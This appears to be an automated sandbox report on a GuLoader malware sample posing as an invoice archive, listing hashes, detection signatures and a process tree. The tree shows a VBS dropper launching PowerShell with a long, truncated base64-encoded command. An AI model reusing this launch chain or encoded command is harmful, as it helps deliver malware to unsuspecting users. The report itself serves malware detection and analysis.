Edit tour
Windows
Analysis Report
WWVN_INVOICE_8363567453.lzh
Overview
General Information
| Sample Name: | WWVN_INVOICE_8363567453.lzh |
| Analysis ID: | 623395 |
| MD5: | 1492683d46a38dc3af26589b486d55ab |
| SHA1: | d7dd2f48e26ca1683643f5671d5a5b7a26da73e0 |
| SHA256: | 8e55ce0d37045fc2d93dde800ae6fea90c6c71d29c5b28837a61d749d5a7810f |
| Infos: |  |
 | |
Detection
GuLoader
| Score: | 84 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
unarchiver.exe (PID: 6912 cmdline: C:\Windows \SysWOW64\ unarchiver .exe" "C:\ Users\user \Desktop\W WVN_INVOIC E_83635674 53.lzh MD5: F737DE1D0C50E20064ACCB6647B50F6C) - 7za.exe (PID: 6936 cmdline:
C:\Windows \System32\ 7za.exe" x -pinfecte d -y -o"C: \Users\use r\AppData\ Local\Temp \jgrsfdcl. bp3" "C:\U sers\user\ Desktop\WW VN_INVOICE _836356745 3.lzh MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) 
conhost.exe (PID: 6960 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5812 cmdline:
cmd.exe" / C "C:\User s\user\App Data\Local \Temp\jgrs fdcl.bp3\W WVN_INVOIC E_83635674 53.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
wscript.exe (PID: 3688 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\jg rsfdcl.bp3 \WWVN_INVO ICE_836356 7453.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884) 
powershell.exe (PID: 6284 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBO AGEAbgBkAG kAbgBtAGUA NQAgAEIAbw BiAGwAZQBr AGEAIABBAH IAdABpAGsA dQBsAGUAcg AgAGgAbwB0 AG0AIABGAG 8AcgBtAG4A aQBuADQAIA BWAGkAZwBl AHMAaQBtAG 8AawBpADYA IABzAHQAbw BtACAARQBj AGgAaQBuAG kAdAA2ACAA cAByAG8Abg BhAHQAaQB2 ACAAUAB5AH IAbwAgAFQA ZQB4AHQAdA B2ADcAIABF AGwAZQB2AG EAdABvAHIA ZgByACAAUg BBAE0AUgBP AEQAUwBBAC AAUQBlAGsA dQByAHMAdQ BzAHMAIABi AGUAYQBuAH AAbwAgAFMA awByAGsAMg AgAHAAbwBs AGEAcgBpAC AAbQBlAGQA ZQBvAGwAYQ AgAEwAbwBy AGEAIABSAG EAcABoAGkA NgAgAA0ACg AjAGQAZQBm AGEAIABwAG kAZQBkACAA VABhAG4AZA BrAGQAcwBi AGUAIABVAG 4AaQBtAG0A bwByACAAQg BhAGQAZwBl AHIAYgA2AC AAZQB4AGMA bAB1AHMAIA BDAGgAbwBu AGQAcgBvAG cAOAAgAEEA RQBSAE8ATA BPACAARgBJ AFMASABFAF IATQBBAE4A SQAgAEYAQQ BHAEkATgBU AEUARwBSAC AASQBuAGMA ZQBwAHQAbw AzACAAUwBu AHUAcgBsAD YAIABCAGkA cwBlAHgAdQ BhACAAZABv AHMAcwBlAH IAIABnAGEA dgBlAGwAIA BtAGUAdABh AGYAbwByAG UAIAB0AHIA YQBuACAAYQ B0AGEAawAg AFMAZQBpAH MAbQBpADIA IABOAG8Abg BmAGEAYgB1 AGwAIABEAG kAZwB0AGUA awAzACAAUg BFAEcATgBT AEsAQQAgAF AAaAB5AHQA bwBtAGUAOQ AgAE0AdQBy AGEAZQAgAE gAYQBsAHYA OAAgAFYATw BDAEkARgBF AFIAQQBUAE UAIABXAE8A TwBEAEMAUg BBAEYAVAAg AGgAYQByAG QAaABlAGEA cgB0ACAASw BuAGkAYgAg AHMAZQBqAH QAIAANAAoA IwBJAG0AbQ BlAHIAdgBr ADgAIABTAH AAcgBvAGcA ZgBsACAAUg BFAEQAUwBI AEkAIABzAG kAZgBmAGwA ZQB1AHMAIA BTAHUAcABl AHIAIAByAG kAZgB0AGUA cgBzACAARw ByAG8AdQBj AGgAIABQAH IAbwBlAHYA ZQB0AGkAIA BQAFIATwBU AEUATgBTAE kAIABMAHkA ZABiAGkAbA BsAGUAZABl ACAAUwBVAE IARQBMAEUA QwBUAFIAIA BSAGEAbQBt AGUAdABjAG gAbwByACAA QwBJAFMAUw BFAFMAQQBS ACAAQgByAG UAZAAgAGoA bwByAGQAZg BzAHQAZQAg AEEAbgB0AG kAcwBlAG4A cwAgAEwATw BYAE8AIAAN AAoAIwBTAH AAbAB1AHIA ZwB5AHAAeQ A3ACAAUwBl AHAAdABlAG 4AIABEAGkA bQBzACAAVA BlAGIAcgBl AHYAcwB1AG 4AYwAyACAA UwB0AHQAdA BlAHAAMgAg AGwAaQBrAH YAaQBkAGUA IABBAGYAdA B2AGkAIABw AGEAbgB0AG 8AZwAgAHYA ZQBqAGIAeQ BnACAAYwBv AGMAbwAgAE kAUwBCAFIA WQAgAFAAQQ BTAFMAIABQ AGkAbgBmAC AAbQB1AG4A aQBrAGEAdA AgAHUAbgBz AGUAIABHAF UATABEAFIA IABNAGUAbA BvAGQAaQBv AHUAIABwAG EAbgBpAG0A ZQB0AGUAIA BSAGEAZgB0 AGUAcwBvAH MAdABlACAA YQB2AGEAbg BjAGUAbQBl AG4AdAAgAE UAbgB0AGUA YQBzAHUAYg BwAHIAIABN AFkAQwBFAC AAVABpAGQA bABuAG4AZQ BkAGUAMwAg AG8AZAB5AH MAcwBlAG4A IABkAHIAeQ BwAHQAcgBy AGUAbgAgAH AAZQByAHMA bwAgAA0ACg AjAGgAbwBy AG4AIABDAG UAbgB0AHIA NAAgAEgAZQ BuAHIAeQBr AGsAZQBzAG wAOAAgAEYA TwBSAEQAQQ BNAFAATgBJ AE4AIABJAG 4AdAByAGEA ZgBvAGwAIA BDAGEAbABk AHIAbwBuAC AAaQBuAGYA cgAgAHYAYQ BsAGcAIABT AEkAUwBZAF IASQAgAEcA ZQBuAG8AYQ BrAG8AIABz AGsAYQBkAG UAZwByAGUA cgAgAFUAbg BkAGUAcgBh AGYAcwBuAG kAMgAgAFYA YQBjAGMAaQ BuAGEAdAAg AGQAcgBpAG wAbABlAHIA aQBlAHIAIA BDAEgAQQBJ ACAADQAKAC MARABlAHQA bwB4AGkAZg AgAGEAZgBt